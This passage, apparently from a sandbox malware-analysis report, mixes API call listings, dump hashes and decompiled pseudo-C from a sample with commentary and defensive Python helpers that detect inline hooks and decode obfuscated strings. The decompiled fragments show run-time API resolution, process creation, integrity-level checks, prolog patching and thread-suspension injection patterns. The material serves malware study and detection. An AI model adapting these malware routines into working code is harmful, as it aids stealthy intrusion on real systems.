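    """Model of WaitForMultipleObjects(n, handles, bWaitAll=FALSE, INFINITE):
    the result is WAIT_OBJECT_0 plus the index of the lowest signalled handle."""
    for index, state in enumerate(signalled):
        if state:
            return WAIT_OBJECT_0 + index
    return WAIT_TIMEOUT  # unreachable with INFINITE; kept so the model is total


def sleep_then_check_stop(count: int, multiplier_low: int, stop_signalled: bool) -> Tuple[float, bool]:
    """One pass of the pattern in E013E5038: arm the timer for `count` units and wait on
    the two-handle array [timer, handle from 0x13ed2a4]. The sample only continues when
    the wait returns 0 (WAIT_OBJECT_0); any other value falls through to cleanup.
    Returns (seconds the timer was armed for, whether the sample would continue).
    The wait is modelled, not performed: the second handle wins whenever it is signalled."""
    low, high = arm_timer(count, multiplier_low)
    seconds = due_time_seconds(low, high)
    result = wait_for_multiple_objects([not stop_signalled, stop_signalled])
    return seconds, result == WAIT_OBJECT_0


if __name__ == "__main__":
    for constant in (0xFF676980, 0xDC3CBA00):
        print(f"0xFFFFFFFF:{constant:08X} -> {unit_seconds(constant):g} s per unit")
    print(sleep_then_check_stop(5, 0xFF676980, stop_signalled=False))
```

Run stand-alone it reports 1 s per unit for 0xFF676980 and 60 s per unit for 0xDC3CBA00, which is what makes the first wait in the function a count of seconds and the wait armed from 0x13ed280 a count of minutes. The same helper answers the practical question when reading a configuration dump: multiply the stored count by `unit_seconds()` of the constant used next to it.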

                              APIs
                              • SleepEx.KERNEL32(00000064,00000001,00000000,?,?,?,01042516), ref: 010422D3
                              • RtlDeleteCriticalSection.NTDLL(01050440), ref: 01042306
                              • RtlDeleteCriticalSection.NTDLL(01050460), ref: 0104230D
                              • ReleaseMutex.KERNEL32(00000768,00000000,?,?,?,01042516), ref: 01042335
                              • CloseHandle.KERNEL32(?,?,01042516), ref: 01042341
                              • ResetEvent.KERNEL32(00000000,00000000,?,?,?,01042516), ref: 0104234D
                              • CloseHandle.KERNEL32(?,?,01042516), ref: 01042359
                              • SleepEx.KERNEL32(00000064,00000001,00000000,?,?,?,01042516), ref: 0104235F
                              • SleepEx.KERNEL32(00000064,00000001,?,?,01042516), ref: 01042373
                              • HeapFree.KERNEL32(00000000,00000000,?,?,01042516), ref: 01042396
                              • RtlRemoveVectoredExceptionHandler.NTDLL(00F9D858), ref: 010423D0
                              • SleepEx.KERNEL32(00000064,00000001,?,?,01042516), ref: 010423DF
                              • CloseHandle.KERNEL32(04B3F068,?,?,01042516), ref: 01042406
                              • LocalFree.KERNEL32(?,?,01042516), ref: 01042416
                                • Part of subcall function 01034132: GetVersion.KERNEL32(?,00000000,747DF720,?,010422C4,00000000,?,?,?,01042516), ref: 01034156
                                • Part of subcall function 01034132: GetModuleHandleA.KERNEL32(?,04B39723,?,010422C4,00000000,?,?,?,01042516), ref: 01034173
                                • Part of subcall function 01034132: GetProcAddress.KERNEL32(00000000), ref: 0103417A
                                • Part of subcall function 01043BE1: RtlEnterCriticalSection.NTDLL(01050460), ref: 01043BEB
                                • Part of subcall function 01043BE1: RtlLeaveCriticalSection.NTDLL(01050460), ref: 01043C27
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: CriticalHandleSectionSleep$Close$DeleteFree$AddressEnterEventExceptionHandlerHeapLeaveLocalModuleMutexProcReleaseRemoveResetVectoredVersion
                              • String ID:
                              • API String ID: 1765366784-0
                              • Opcode ID: 8b81513206af8200a2fd0bdbb3ae47bb8ee3f3bb1d6b40da844dbec9b11385bc
                              • Instruction ID: 90435fc94c1e3853f899967ae2df5956cad116bc66104426a6cb823a387ba872
                              • Opcode Fuzzy Hash: 8b81513206af8200a2fd0bdbb3ae47bb8ee3f3bb1d6b40da844dbec9b11385bc
                              • Instruction Fuzzy Hash: F9414FB1740302ABEB70AF69EDC4A5E7BEABB00741B1544B4F6C5D715CCB7B98808B25
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • lstrlen.KERNEL32(0104F4B4,?,00000000,?,0102B2DF,0104F4E4,?,?,00000004,00000000), ref: 01034D13
                              • VirtualProtect.KERNELBASE(00000000,00000000,00000040,-00000020,?,00000000,?,0102B2DF,0104F4E4,?,?,00000004,00000000), ref: 01034D25
                              • lstrcpy.KERNEL32(00000000,0104F4B4), ref: 01034D34
                              • VirtualProtect.KERNELBASE(00000000,00000000,?,-00000020,?,00000000,?,0102B2DF,0104F4E4,?,?,00000004,00000000), ref: 01034D45
                              • VirtualProtect.KERNELBASE(?,00000005,00000040,-00000020,0104C508,00000018,010235A8,?,00000000,?,0102B2DF,0104F4E4,?,?,00000004,00000000), ref: 01034D7B
                              • VirtualProtect.KERNELBASE(?,00000004,?,-00000020,?,00000000,?,0102B2DF,0104F4E4,?,?,00000004,00000000), ref: 01034D96
                              • VirtualProtect.KERNEL32(?,00000004,00000040,-00000020,0104C508,00000018,010235A8,?,00000000,?,0102B2DF,0104F4E4,?,?,00000004,00000000), ref: 01034DAB
                              • VirtualProtect.KERNELBASE(?,00000004,00000040,-00000020,0104C508,00000018,010235A8,?,00000000,?,0102B2DF,0104F4E4,?,?,00000004,00000000), ref: 01034DD8
                              • VirtualProtect.KERNELBASE(?,00000004,?,-00000020,?,00000000,?,0102B2DF,0104F4E4,?,?,00000004,00000000), ref: 01034DF2
                              • GetLastError.KERNEL32(?,00000000,?,0102B2DF,0104F4E4,?,?,00000004,00000000), ref: 01034DF9
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: ProtectVirtual$ErrorLastlstrcpylstrlen
                              • String ID:
                              • API String ID: 3676034644-0
                              • Opcode ID: 00c8e1c57088f2aeeec05648454cdf54fc0eb955d5a0d70bb871e583c524f5f3
                              • Instruction ID: 34de78928e58308c705567f52409dd8d7df1ba8850c857c5c72eff9045f2f008
                              • Opcode Fuzzy Hash: 00c8e1c57088f2aeeec05648454cdf54fc0eb955d5a0d70bb871e583c524f5f3
                              • Instruction Fuzzy Hash: 404100B19406059FEB319F65CD84EAABBF9FB48310F008655E692EB5A4D735E805CB20
                              Uniqueness

                              Uniqueness Score: -1.00%
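The VirtualProtect(?, 5, 0x40) / lstrcpy / VirtualProtect sequence in the function above is the shape of a five-byte inline hook written over a function prolog, which is what the "Modifies the prolog of user mode functions (user mode inline hooks)" signature refers to. The checker below is an added example, not code from the sample or from the sandbox: given the first bytes at a 32-bit function entry it recognises the common detour encodings, resolves the target, and flags targets that leave the owning image. The module base and size, the export names, the addresses and the prolog bytes are constructed for the example.

```python
"""Prolog hook check for 32-bit exports (added example; not the sample's or the sandbox's code).

VirtualProtect(addr, 5, PAGE_EXECUTE_READWRITE), a copy of five bytes, and a restore
of the old protection is how a detour is written over a function entry. This helper
reads such a prolog back and says where control goes. All sample data is constructed.
"""
import struct
from typing import Dict, List, Optional, Tuple

PAGE_EXECUTE_READWRITE = 0x40


def decode_prolog(func_va: int, prolog: bytes) -> Tuple[str, Optional[int]]:
    """Classify the first bytes at a function entry and resolve the detour target.

    Returns (kind, target_va):
      'jmp_rel32' : E9 rel32       target = entry + 5 + rel32
      'push_ret'  : 68 imm32 C3    target = imm32
      'jmp_abs'   : FF 25 addr32   target = addr32 (a pointer slot, not dereferenced here)
      'clean'     : anything else  target = None
    """
    if len(prolog) < 5:
        raise ValueError("need at least 5 bytes of prolog")
    if prolog[0] == 0xE9:
        rel = struct.unpack_from("<i", prolog, 1)[0]
        return "jmp_rel32", (func_va + 5 + rel) & 0xFFFFFFFF
    if prolog[0] == 0x68 and len(prolog) >= 6 and prolog[5] == 0xC3:
        return "push_ret", struct.unpack_from("<I", prolog, 1)[0]
    if prolog[:2] == b"\xFF\x25":
        return "jmp_abs", struct.unpack_from("<I", prolog, 2)[0]
    return "clean", None


def target_in_image(target: int, image_base: int, image_size: int) -> bool:
    """True if the detour target lies inside the module that owns the function."""
    return image_base <= target < image_base + image_size


def make_jmp_rel32(func_va: int, target_va: int) -> bytes:
    """Build the 5-byte JMP a hooker writes; used here only to construct test input."""
    return b"\xE9" + struct.pack("<i", target_va - (func_va + 5))


def scan_exports(exports: Dict[str, Tuple[int, bytes]], image_base: int, image_size: int) -> List[dict]:
    """Report every export whose prolog is not clean, with the detour target and whether
    it leaves the owning image (the usual sign of a hook stub living in injected memory)."""
    findings = []
    for name, (va, prolog) in exports.items():
        kind, target = decode_prolog(va, prolog)
        if kind == "clean":
            continue
        findings.append({
            "export": name,
            "va": va,
            "kind": kind,
            "target": target,
            "outside_image": target is not None and not target_in_image(target, image_base, image_size),
        })
    return findings


# Constructed sample: a fake ntdll mapped at 0x77A00000 (size 0x180000) with one
# untouched export and one whose first five bytes were replaced by a JMP into a
# region at 0x01020000 that no image backs, like the injected code on this page.
NTDLL_BASE, NTDLL_SIZE = 0x77A00000, 0x00180000
STUB_VA = 0x01023000
SAMPLE_EXPORTS = {
    "NtQueryValueKey": (0x77A12340, make_jmp_rel32(0x77A12340, STUB_VA) + b"\x8B\xEC"),
    "NtClose": (0x77A11F00, b"\xB8\x0C\x00\x00\x00\xBA"),  # mov eax, 0Ch ; mov edx, ...
}

if __name__ == "__main__":
    for finding in scan_exports(SAMPLE_EXPORTS, NTDLL_BASE, NTDLL_SIZE):
        print(finding)
```

On a live system the prolog bytes come from reading the target process (or from comparing the mapped module against its file on disk), and the image range from the module list; a target that falls in a region the module list does not account for, as the 0x01020000 region in this report ("based on PE: false"), is the finding worth escalating.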

                              C-Code - Quality: 73%
                              			E013E87A1(void* __eax, void* __ecx) {
                              				long _v8;
                              				char _v12;
                              				void* _v16;
                              				void* _v28;
                              				long _v32;
                              				void _v104;
                              				char _v108;
                              				long _t36;
                              				intOrPtr _t40;
                              				intOrPtr _t47;
                              				intOrPtr _t50;
                              				void* _t58;
                              				void* _t68;
                              				intOrPtr* _t70;
                              				intOrPtr* _t71;
                              
                              				_t1 = __eax + 0x14; // 0x74183966
                              				_t69 =  *_t1;
                              				_t36 = E013E6CE5(__ecx,  *((intOrPtr*)( *_t1 + 0xc)),  &_v12,  &_v16); // executed
                              				_v8 = _t36;
                              				if(_t36 != 0) {
                              					L12:
                              					return _v8;
                              				}
                              				E013EAA99( *((intOrPtr*)(_t69 + 0xc)),  *((intOrPtr*)(_t69 + 8)), _v12);
                              				_t40 = _v12(_v12);
                              				_v8 = _t40;
                              				if(_t40 == 0 && ( *0x13ed298 & 0x00000001) != 0) {
                              					_v32 = 0;
                              					asm("stosd");
                              					asm("stosd");
                              					asm("stosd");
                              					_v108 = 0;
                              					memset( &_v104, 0, 0x40);
                              					_t47 =  *0x13ed2b8; // 0x26ea5a8
                              					_t18 = _t47 + 0x13ee3b3; // 0x73797325 = "%sys" little-endian: an environment-variable path, expanded by ExpandEnvironmentStringsA inside E013E70F1
                              					_t68 = E013E70F1(_t18);
                              					if(_t68 == 0) {
                              						_v8 = 8;
                              					} else {
                              						_t50 =  *0x13ed2b8; // 0x26ea5a8
                              						_t19 = _t50 + 0x13ee760; // 0x3ad8d08 (procedure name; its text is not in this dump)
                              						_t20 = _t50 + 0x13ee0af; // 0x4e52454b = "KERN" little-endian: a module name beginning "KERN"
                              						_t71 = GetProcAddress(GetModuleHandleA(_t20), _t19); // resolved at run time, so the API does not appear in the import table
                              						if(_t71 == 0) {
                              							_v8 = 0x7f;
                              						} else {
                              							_v108 = 0x44; // STARTUPINFOA.cb = sizeof(STARTUPINFOA) = 68 on 32-bit Windows
                              							E013E2522();
                              							_t58 =  *_t71(0, _t68, 0, 0, 0, 0x4000000, 0, 0,  &_v108,  &_v32, 0); // executed; the argument layout is consistent with the CreateProcess family: &_v108 as lpStartupInfo, &_v32 as lpProcessInformation (its two handles are closed below), and 0x4000000 = CREATE_DEFAULT_ERROR_MODE as dwCreationFlags
                              							_push(1);
                              							E013E2522();
                              							if(_t58 == 0) {
                              								_v8 = GetLastError();
                              							} else {
                              								CloseHandle(_v28);
                              								CloseHandle(_v32);
                              							}
                              						}
                              						HeapFree( *0x13ed270, 0, _t68);
                              					}
                              				}
                              				_t70 = _v16;
                              				 *((intOrPtr*)(_t70 + 0x18))( *((intOrPtr*)(_t70 + 0x1c))( *_t70));
                              				E013E6DFA(_t70);
                              				goto L12;
                              			}
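The hex immediates in E013E87A1 and in its API list are the first four bytes of string arguments, which the decompiler shows as dwords; read little-endian they give 0x4E52454B = "KERN", 0x73797325 = "%sys", 4C44544E = "NTDL" and 7243775A = "ZwCr". The scanner below is an added example, not code from the sample or from the sandbox; the listing lines it processes are copied from this page, and it assumes a 32-bit little-endian layout, which the x86 addresses in the report support.

```python
"""Recover string fragments from dword immediates in a decompiler listing
(added example; not the sample's or the sandbox's code).

A dword loaded from the start of a string holds its first four bytes in
little-endian order, so 0x4E52454B is the bytes 4B 45 52 4E = "KERN". Two UTF-16LE
code units fit the same way: 0x004F0053 is "SO". The listing lines below are copied
from this page; everything else is the example's own.
"""
import re
import struct
from typing import Dict, List, Optional, Tuple

# An 8-hex-digit token, with or without the 0x prefix, on its own word boundary.
HEX_IMMEDIATE = re.compile(r"\b(?:0x)?([0-9A-Fa-f]{8})\b")


def dword_to_ascii(value: int) -> Optional[str]:
    """Interpret a dword as four little-endian bytes; return text if all are printable ASCII."""
    raw = struct.pack("<I", value & 0xFFFFFFFF)
    if all(0x20 <= b < 0x7F for b in raw):
        return raw.decode("ascii")
    return None


def dword_to_utf16(value: int) -> Optional[str]:
    """Same for a dword holding two UTF-16LE code units that are both printable ASCII."""
    raw = struct.pack("<I", value & 0xFFFFFFFF)
    try:
        text = raw.decode("utf-16-le")
    except UnicodeDecodeError:  # a lone surrogate half, cannot be text
        return None
    if all(0x20 <= ord(c) < 0x7F for c in text):
        return text
    return None


def decode_immediates(line: str) -> List[Tuple[str, str, str]]:
    """Return (hex, kind, text) for every 8-digit immediate on a listing line that decodes.
    Addresses such as 013E6D2C fall out naturally: their bytes are not printable."""
    out = []
    for match in HEX_IMMEDIATE.finditer(line):
        value = int(match.group(1), 16)
        text = dword_to_ascii(value)
        if text is not None:
            out.append((match.group(1).upper(), "ascii", text))
            continue
        text = dword_to_utf16(value)
        if text is not None:
            out.append((match.group(1).upper(), "utf16", text))
    return out


def decode_listing(lines: List[str]) -> Dict[str, Tuple[str, str]]:
    """Decode all lines; returns {HEX: (kind, text)} with duplicates collapsed."""
    found: Dict[str, Tuple[str, str]] = {}
    for line in lines:
        for hexval, kind, text in decode_immediates(line):
            found.setdefault(hexval, (kind, text))
    return found


# Lines copied from this report (the API lists of E013E87A1 and of its subcalls).
LISTING_LINES = [
    "GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,013E87BD,?,?,?,?,00000000,00000000), ref: 013E6D0A",
    "GetProcAddress.KERNEL32(00000000,7243775A), ref: 013E6D2C",
    "GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 013E6D6E",
    "_t18 = _t47 + 0x13ee3b3; // 0x73797325",
    "_t20 = _t50 + 0x13ee0af; // 0x4e52454b",
    "HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,03AD93F0,?,00000000,30314549,00000014,004F0053,03AD93AC), ref: 013E4D42",
]

if __name__ == "__main__":
    for hexval, (kind, text) in decode_listing(LISTING_LINES).items():
        print(f"{hexval}  {kind:5}  {text!r}")
```

Only the first four bytes of each string are recoverable this way, so "ZwCr" or "RtlN" narrows the resolved procedure to a family rather than naming it; the value of the pass is that it turns an opaque list of GetProcAddress calls into "ntdll, Zw*/Rtl* procedures, a kernel32 module name and a %sys... path" without waiting for a memory dump that contains the full strings.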

                              (instruction address column of the E013E87A1 listing, 0x013e87a9 to 0x013e88d8, with 0x00000000 entries for lines that map to no instruction; the instruction text did not survive extraction)


                              APIs
                                • Part of subcall function 013E6CE5: GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,013E87BD,?,?,?,?,00000000,00000000), ref: 013E6D0A
                                • Part of subcall function 013E6CE5: GetProcAddress.KERNEL32(00000000,7243775A), ref: 013E6D2C
                                • Part of subcall function 013E6CE5: GetProcAddress.KERNEL32(00000000,614D775A), ref: 013E6D42
                                • Part of subcall function 013E6CE5: GetProcAddress.KERNEL32(00000000,6E55775A), ref: 013E6D58
                                • Part of subcall function 013E6CE5: GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 013E6D6E
                                • Part of subcall function 013E6CE5: GetProcAddress.KERNEL32(00000000,6C43775A), ref: 013E6D84
                              • memset.NTDLL ref: 013E880B
                                • Part of subcall function 013E70F1: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,74183966,00000000,013E8824,73797325), ref: 013E7102
                                • Part of subcall function 013E70F1: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 013E711C
                              • GetModuleHandleA.KERNEL32(4E52454B,03AD8D08,73797325), ref: 013E8841
                              • GetProcAddress.KERNEL32(00000000), ref: 013E8848
                              • HeapFree.KERNEL32(00000000,00000000), ref: 013E88B0
                                • Part of subcall function 013E2522: GetProcAddress.KERNEL32(36776F57,013E6342), ref: 013E253D
                              • CloseHandle.KERNEL32(00000000,00000001), ref: 013E888D
                              • CloseHandle.KERNEL32(?), ref: 013E8892
                              • GetLastError.KERNEL32(00000001), ref: 013E8896
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.655495954.00000000013E1000.00000020.00020000.sdmp, Offset: 013E0000, based on PE: true
                              • Associated: 00000000.00000002.655418004.00000000013E0000.00000004.00020000.sdmp
                              • Associated: 00000000.00000002.655701530.00000000013EC000.00000002.00020000.sdmp
                              • Associated: 00000000.00000002.655806217.00000000013ED000.00000004.00020000.sdmp
                              • Associated: 00000000.00000002.655861835.00000000013EF000.00000002.00020000.sdmp
                              Similarity
                              • API ID: AddressProc$Handle$CloseEnvironmentExpandModuleStrings$ErrorFreeHeapLastmemset
                              • String ID: Uxt
                              • API String ID: 3075724336-1536154274
                              • Opcode ID: 2ab808b8166761c050fe77f6c1a3f7e8710be627f9160c12019456d5cea2dcbc
                              • Instruction ID: 397a4d072fc68221cc0ea44c6a03167b93f87ee6ea9b162c2d9edafc55d6e39c
                              • Opcode Fuzzy Hash: 2ab808b8166761c050fe77f6c1a3f7e8710be627f9160c12019456d5cea2dcbc
                              • Instruction Fuzzy Hash: E1313DB6C00319EFDB219FA8DC88D9EBFFCEB04358F1444A5EA06A7191D7309D448B60
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                                • Part of subcall function 01044E7E: VirtualProtect.KERNELBASE(?,?,00000040,00000000,03AE75A8,?,00000000,03AE75A8,?,0102B24B,00000004,00000000), ref: 01044EA3
                                • Part of subcall function 01044E7E: GetLastError.KERNEL32(?,00000000,03AE75A8,?,0102B24B,00000004,00000000), ref: 01044EAB
                                • Part of subcall function 01044E7E: VirtualQuery.KERNEL32(?,03AE75A8,0000001C,?,00000000,03AE75A8,?,0102B24B,00000004,00000000), ref: 01044EC2
                                • Part of subcall function 01044E7E: VirtualProtect.KERNEL32(?,?,-2C9B417C,00000000,?,00000000,03AE75A8,?,0102B24B,00000004,00000000), ref: 01044EE7
                              • GetLastError.KERNEL32(00000000,00000004,0104F518,?,0104F4B4,00000000,00000002,0104C578,0000001C,0103496D,00000002,?,00000001,?,0104F514,?), ref: 0102AF38
                                • Part of subcall function 01034B11: lstrlen.KERNEL32(?,00000004,0102B24B,00000004,00000000), ref: 01034B49
                                • Part of subcall function 01034B11: lstrcpy.KERNEL32(00000000,?), ref: 01034B60
                                • Part of subcall function 01034B11: StrChrA.SHLWAPI(00000000,0000002E), ref: 01034B69
                                • Part of subcall function 01034B11: GetModuleHandleA.KERNEL32(00000000), ref: 01034B87
                              • VirtualProtect.KERNELBASE(00000000,00000005,00000040,00000040,00000000,00000005,00000400,?,?,?,00000000,00000000,00000004,0104F518,?,0104F4B4), ref: 0102AEB6
                              • VirtualProtect.KERNELBASE(00000000,00000004,0104F518,0104F518,?,00000000,00000000,00000004,0104F518,?,0104F4B4,00000000,00000002,0104C578,0000001C,0103496D), ref: 0102AED1
                              • RtlEnterCriticalSection.NTDLL(01050460), ref: 0102AEF5
                              • RtlLeaveCriticalSection.NTDLL(01050460), ref: 0102AF13
                                • Part of subcall function 01044E7E: SetLastError.KERNEL32(?,?,00000000,03AE75A8,?,0102B24B,00000004,00000000), ref: 01044EF0
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: Virtual$Protect$ErrorLast$CriticalSection$EnterHandleLeaveModuleQuerylstrcpylstrlen
                              • String ID:
                              • API String ID: 899430048-3916222277
                              • Opcode ID: 46c2f77989508eff1bd86a23af1e3b2ca5cff0f3924cafd838dac1965c876a4a
                              • Instruction ID: 71b8048b95f796d54cb298aff787320f6a357961dd5480b790d7df1d28884b0c
                              • Opcode Fuzzy Hash: 46c2f77989508eff1bd86a23af1e3b2ca5cff0f3924cafd838dac1965c876a4a
                              • Instruction Fuzzy Hash: 9C417EB1A00619EFDB50DF98C984A9EBBF4FF48310F008159F995AB694DB34E941CFA0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                                • Part of subcall function 010467CD: GetProcAddress.KERNEL32(?,00000318), ref: 010467F2
                                • Part of subcall function 010467CD: NtWow64QueryInformationProcess64.NTDLL(00000000,00000000,?,00000030,00000000), ref: 0104680E
                              • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004), ref: 01034428
                              • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 01034513
                                • Part of subcall function 010467CD: StrRChrA.SHLWAPI(00000018,00000000,0000005C,00000000,00000318,?,00000000,00000068,00000098,00000000,00000028,00000040,00000000,00000000,00000028,00000100), ref: 01046978
                              • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,00000000,?,?), ref: 0103445E
                              • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 0103446A
                              • lstrcmpi.KERNEL32(?,00000000), ref: 010344A7
                              • StrChrA.SHLWAPI(?,0000002E), ref: 010344B0
                              • lstrcmpi.KERNEL32(?,00000000), ref: 010344C2
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: Virtual$AllocFreelstrcmpi$AddressInformationProcProcess64QueryWow64
                              • String ID:
                              • API String ID: 3901270786-0
                              • Opcode ID: 9d10e3943799b492802ee2780554464189a8b34221e91b39e33876a03c7b3401
                              • Instruction ID: da198ca2ca6c74152a8cd154df726130aa39b49da76f82f8b48d816949ec6af0
                              • Opcode Fuzzy Hash: 9d10e3943799b492802ee2780554464189a8b34221e91b39e33876a03c7b3401
                              • Instruction Fuzzy Hash: F7317F75504311ABE3218F15C840B6BBBE8FFC8B54F044969FAC5AB281DB34E944CBA6
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                                • Part of subcall function 01022E31: memset.NTDLL ref: 01022E3B
                              • OpenEventA.KERNEL32(00000002,00000000,00000000,00000000,?,01028ECE,?,00000000), ref: 01039C48
                              • SetEvent.KERNEL32(00000000,?,01028ECE,?,00000000,?,?,?,?,?,?,?,?,?,0103940A,?), ref: 01039C55
                              • Sleep.KERNEL32(00000BB8,?,01028ECE,?,00000000,?,?,?,?,?,?,?,?,?,0103940A,?), ref: 01039C60
                              • ResetEvent.KERNEL32(00000000,?,01028ECE,?,00000000,?,?,?,?,?,?,?,?,?,0103940A,?), ref: 01039C67
                              • CloseHandle.KERNEL32(00000000,?,01028ECE,?,00000000,?,?,?,?,?,?,?,?,?,0103940A,?), ref: 01039C6E
                              • GetShellWindow.USER32 ref: 01039C79
                              • GetWindowThreadProcessId.USER32(00000000), ref: 01039C80
                                • Part of subcall function 010233D9: RegCloseKey.ADVAPI32(?,?,?), ref: 0102345C
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: Event$CloseWindow$HandleOpenProcessResetShellSleepThreadmemset
                              • String ID:
                              • API String ID: 53838381-0
                              • Opcode ID: e87b9658d9e1739736f67562daa071ecf8f26d3c61032e5d8162643d8bc5ad3c
                              • Instruction ID: aa9f4c585fa619e49f77f974f9b7f0df4b8ec499185fcd83cb99f3a7a0449b5e
                              • Opcode Fuzzy Hash: e87b9658d9e1739736f67562daa071ecf8f26d3c61032e5d8162643d8bc5ad3c
                              • Instruction Fuzzy Hash: C121B676200318BBD3306766DD88EAF7BADABC5314F048008FACA87119CB7A5800CB61
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                              			E013E4DCF(long* _a4) {
                              				long _v8;
                              				void* _v12;
                              				void _v16;
                              				long _v20;
                              				int _t33;
                              				void* _t46;
                              
                              				_v16 = 1;
                              				_v20 = 0x2000;
                              				if( *0x13ed294 > 5) {
                              					_v16 = 0;
                              					if(OpenProcessToken(0xffffffff, 0x20008,  &_v12) != 0) {
                              						GetTokenInformation(_v12, 0x14,  &_v16, 4,  &_v8); // executed
                              						_v8 = 0;
                              						GetTokenInformation(_v12, 0x19, 0, 0,  &_v8); // executed
                              						if(_v8 != 0) {
                              							_t46 = E013E55DC(_v8);
                              							if(_t46 != 0) {
                              								_t33 = GetTokenInformation(_v12, 0x19, _t46, _v8,  &_v8); // executed
                              								if(_t33 != 0) {
                              									_v20 =  *(GetSidSubAuthority( *_t46,  *(GetSidSubAuthorityCount( *_t46)) - 0x00000001 & 0x000000ff));
                              								}
                              								E013E6DFA(_t46);
                              							}
                              						}
                              						CloseHandle(_v12);
                              					}
                              				}
                              				 *_a4 = _v20;
                              				return _v16;
                              			}

                              APIs
                              • OpenProcessToken.ADVAPI32(000000FF,00020008,00000000,00000000), ref: 013E4E01
                              • GetTokenInformation.KERNELBASE(00000000,00000014(TokenIntegrityLevel),00000001,00000004,?,00000000), ref: 013E4E21
                              • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,00000000,?), ref: 013E4E31
                              • CloseHandle.KERNEL32(00000000), ref: 013E4E81
                                • Part of subcall function 013E55DC: RtlAllocateHeap.NTDLL(00000000,00000000,013E552C), ref: 013E55E8
                              • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,?,?,?,?), ref: 013E4E54
                              • GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 013E4E5C
                              • GetSidSubAuthority.ADVAPI32(00000000,?), ref: 013E4E6C
                              Memory Dump Source
                              • Source File: 00000000.00000002.655495954.00000000013E1000.00000020.00020000.sdmp, Offset: 013E0000, based on PE: true
                              • Associated: 00000000.00000002.655418004.00000000013E0000.00000004.00020000.sdmp
                              • Associated: 00000000.00000002.655701530.00000000013EC000.00000002.00020000.sdmp
                              • Associated: 00000000.00000002.655806217.00000000013ED000.00000004.00020000.sdmp
                              • Associated: 00000000.00000002.655861835.00000000013EF000.00000002.00020000.sdmp
                              Similarity
                              • API ID: Token$Information$Authority$AllocateCloseCountHandleHeapOpenProcess
                              • String ID:
                              • API String ID: 1295030180-0
                              • Opcode ID: facfd7b3cb5ffb7114200b1188dde368d3e644f9965d3b321a16998f55a9585c
                              • Instruction ID: 087c284b833cda3210819df88e53df447a07df1684f3a70301f5bc6dd9f81659
                              • Opcode Fuzzy Hash: facfd7b3cb5ffb7114200b1188dde368d3e644f9965d3b321a16998f55a9585c
                              • Instruction Fuzzy Hash: DB212A75900319FFEB209F94DD48EEEBFBDEB48318F140065EA15A6190C7719A45DB50
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • memset.NTDLL ref: 01033B68
                                • Part of subcall function 010254B6: GetModuleHandleA.KERNEL32(?,010501F4,?,?,?,01033B88,00000000,010501F4,?,00000000), ref: 010254D7
                                • Part of subcall function 010254B6: GetProcAddress.KERNEL32(00000000,?), ref: 010254F0
                                • Part of subcall function 010254B6: OpenProcess.KERNEL32(00000400,00000000,01033B88,010501F4,?,?,?,01033B88,00000000,010501F4,?,00000000), ref: 0102550D
                                • Part of subcall function 010254B6: IsWow64Process.KERNEL32(00000000,00000000,010501F4,?,?,?,01033B88,00000000,010501F4,?,00000000), ref: 0102551E
                                • Part of subcall function 010254B6: CloseHandle.KERNEL32(00000000,?,?,01033B88,00000000,010501F4,?,00000000), ref: 01025531
                              • ResumeThread.KERNEL32(?,?,?,CCCCFEEB,?,?,?,00000004,?,00000000,010501F4,?,00000000), ref: 01033C21
                              • WaitForSingleObject.KERNEL32(00000064), ref: 01033C2F
                              • SuspendThread.KERNEL32(?), ref: 01033C42
                                • Part of subcall function 0102D551: NtUnmapViewOfSection.NTDLL(000000FF,00000000,?,00000000), ref: 0102D7CD
                                • Part of subcall function 0102D551: memset.NTDLL ref: 0102D7F5
                              • ResumeThread.KERNELBASE(?), ref: 01033CC4
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: Thread$HandleProcessResumememset$AddressCloseModuleObjectOpenProcSectionSingleSuspendUnmapViewWaitWow64
                              • String ID:
                              • API String ID: 664769717-0
                              • Opcode ID: 13ead783c3be1044422603efb52d327d5277074d0256264bda70b1ac9f661987
                              • Instruction ID: 2911591f04ff97732ca732facbd83a57b7e1c84e948c31e5f39217bc45610c0f
                              • Opcode Fuzzy Hash: 13ead783c3be1044422603efb52d327d5277074d0256264bda70b1ac9f661987
                              • Instruction Fuzzy Hash: 4641AE7190020DEFDB619F99CDC4AEEBBB9BB84300F0444A5F9959B150C735DA54CB50
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
